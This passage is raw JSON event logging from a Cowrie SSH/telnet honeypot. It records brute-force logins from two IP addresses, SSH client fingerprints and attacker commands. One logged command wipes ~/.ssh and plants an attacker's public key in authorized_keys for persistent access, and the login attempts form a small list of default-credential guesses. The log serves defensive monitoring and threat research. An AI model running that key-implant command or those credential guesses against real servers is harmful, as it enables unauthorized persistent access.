{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:22:04.647973Z","src_ip":"212.227.235.229","session":"98aaa1d075fd"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:22:04.838694Z","src_ip":"217.154.1.158","session":"792774a27742"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:22:05.705616Z","src_ip":"212.227.235.229","session":"98aaa1d075fd"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:22:05.959293Z","src_ip":"212.227.235.229","session":"98aaa1d075fd"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:22:05.960220Z","src_ip":"212.227.235.229","session":"22419fde8b06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41406,"dst_ip":"1.2.3.4","dst_port":23,"session":"bc4e1ee50479","protocol":"telnet","message":"New connection: 212.227.235.229:41406 (1.2.3.4:23) [session: bc4e1ee50479]","sensor":"my-vps","timestamp":"2025-08-26T19:22:19.633248Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:22:19.862086Z","src_ip":"212.227.235.229","session":"bc4e1ee50479"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:22:19.886008Z","src_ip":"212.227.235.229","session":"bc4e1ee50479"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":45850,"dst_ip":"1.2.3.4","dst_port":22,"session":"f60c30a8e11f","protocol":"ssh","message":"New connection: 217.154.1.158:45850 (1.2.3.4:22) [session: f60c30a8e11f]","sensor":"my-vps","timestamp":"2025-08-26T19:22:21.199761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:22:21.200848Z","src_ip":"217.154.1.158","session":"f60c30a8e11f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:22:21.215113Z","src_ip":"217.154.1.158","session":"f60c30a8e11f"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab","message":"login attempt [gitlab/gitlab] failed","sensor":"my-vps","timestamp":"2025-08-26T19:22:21.259759Z","src_ip":"217.154.1.158","session":"f60c30a8e11f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:22:22.276508Z","src_ip":"217.154.1.158","session":"f60c30a8e11f"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":50750,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb6202e41ccc","protocol":"ssh","message":"New connection: 217.154.1.158:50750 (1.2.3.4:22) [session: cb6202e41ccc]","sensor":"my-vps","timestamp":"2025-08-26T19:22:38.651809Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:22:38.652802Z","src_ip":"217.154.1.158","session":"cb6202e41ccc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:22:38.668201Z","src_ip":"217.154.1.158","session":"cb6202e41ccc"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache123","message":"login attempt [apache/apache123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:22:38.711639Z","src_ip":"217.154.1.158","session":"cb6202e41ccc"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:22:39.728057Z","src_ip":"217.154.1.158","session":"cb6202e41ccc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33678,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e2b078aeeaa","protocol":"ssh","message":"New connection: 212.227.235.229:33678 (1.2.3.4:22) [session: 7e2b078aeeaa]","sensor":"my-vps","timestamp":"2025-08-26T19:22:45.487425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:22:45.730336Z","src_ip":"212.227.235.229","session":"7e2b078aeeaa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:22:45.731000Z","src_ip":"212.227.235.229","session":"7e2b078aeeaa"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword147","message":"login attempt [root/P@ssword147] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:22:46.776801Z","src_ip":"212.227.235.229","session":"7e2b078aeeaa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:22:47.170894Z","src_ip":"212.227.235.229","session":"7e2b078aeeaa"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T19:22:47.171607Z","src_ip":"212.227.235.229","session":"7e2b078aeeaa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:22:47.340914Z","src_ip":"212.227.235.229","session":"7e2b078aeeaa"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:22:47.342023Z","src_ip":"212.227.235.229","session":"7e2b078aeeaa"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":47940,"dst_ip":"1.2.3.4","dst_port":22,"session":"c56e2a3d66f1","protocol":"ssh","message":"New connection: 217.154.1.158:47940 (1.2.3.4:22) [session: c56e2a3d66f1]","sensor":"my-vps","timestamp":"2025-08-26T19:22:56.089200Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:22:56.090065Z","src_ip":"217.154.1.158","session":"c56e2a3d66f1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:22:56.104189Z","src_ip":"217.154.1.158","session":"c56e2a3d66f1"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd","message":"login attempt [root/P@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:22:56.162642Z","src_ip":"217.154.1.158","session":"c56e2a3d66f1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:22:56.256241Z","src_ip":"217.154.1.158","session":"c56e2a3d66f1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:22:56.256962Z","src_ip":"217.154.1.158","session":"c56e2a3d66f1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:22:56.285675Z","src_ip":"217.154.1.158","session":"c56e2a3d66f1"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:22:56.286843Z","src_ip":"217.154.1.158","session":"c56e2a3d66f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53636,"dst_ip":"1.2.3.4","dst_port":22,"session":"f33d6e610e75","protocol":"ssh","message":"New connection: 212.227.235.229:53636 (1.2.3.4:22) [session: f33d6e610e75]","sensor":"my-vps","timestamp":"2025-08-26T19:23:07.456916Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:23:07.459590Z","src_ip":"212.227.235.229","session":"f33d6e610e75"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:23:07.711770Z","src_ip":"212.227.235.229","session":"f33d6e610e75"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@WSX2025","message":"login attempt [root/1qaz@WSX2025] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:23:08.735523Z","src_ip":"212.227.235.229","session":"f33d6e610e75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:23:09.268476Z","src_ip":"212.227.235.229","session":"f33d6e610e75"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:23:09.269207Z","src_ip":"212.227.235.229","session":"f33d6e610e75"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:23:09.270080Z","src_ip":"212.227.235.229","session":"f33d6e610e75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:23:09.526530Z","src_ip":"212.227.235.229","session":"f33d6e610e75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:23:10.149866Z","src_ip":"212.227.235.229","session":"f33d6e610e75"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:23:10.150559Z","src_ip":"212.227.235.229","session":"f33d6e610e75"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:23:10.407939Z","src_ip":"212.227.235.229","session":"f33d6e610e75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:23:10.408939Z","src_ip":"212.227.235.229","session":"f33d6e610e75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54267,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc6309da83d6","protocol":"ssh","message":"New connection: 212.227.235.229:54267 (1.2.3.4:22) [session: cc6309da83d6]","sensor":"my-vps","timestamp":"2025-08-26T19:23:10.665893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:23:10.666899Z","src_ip":"212.227.235.229","session":"cc6309da83d6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:23:10.931650Z","src_ip":"212.227.235.229","session":"cc6309da83d6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:23:12.045350Z","src_ip":"212.227.235.229","session":"cc6309da83d6"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:23:13.311233Z","src_ip":"212.227.235.229","session":"cc6309da83d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54863,"dst_ip":"1.2.3.4","dst_port":22,"session":"db2be7576dcc","protocol":"ssh","message":"New connection: 212.227.235.229:54863 (1.2.3.4:22) [session: db2be7576dcc]","sensor":"my-vps","timestamp":"2025-08-26T19:23:13.571377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:23:13.578626Z","src_ip":"212.227.235.229","session":"db2be7576dcc"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":51950,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca017bf7700c","protocol":"ssh","message":"New connection: 217.154.1.158:51950 (1.2.3.4:22) [session: ca017bf7700c]","sensor":"my-vps","timestamp":"2025-08-26T19:23:13.709435Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:23:13.711074Z","src_ip":"217.154.1.158","session":"ca017bf7700c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-c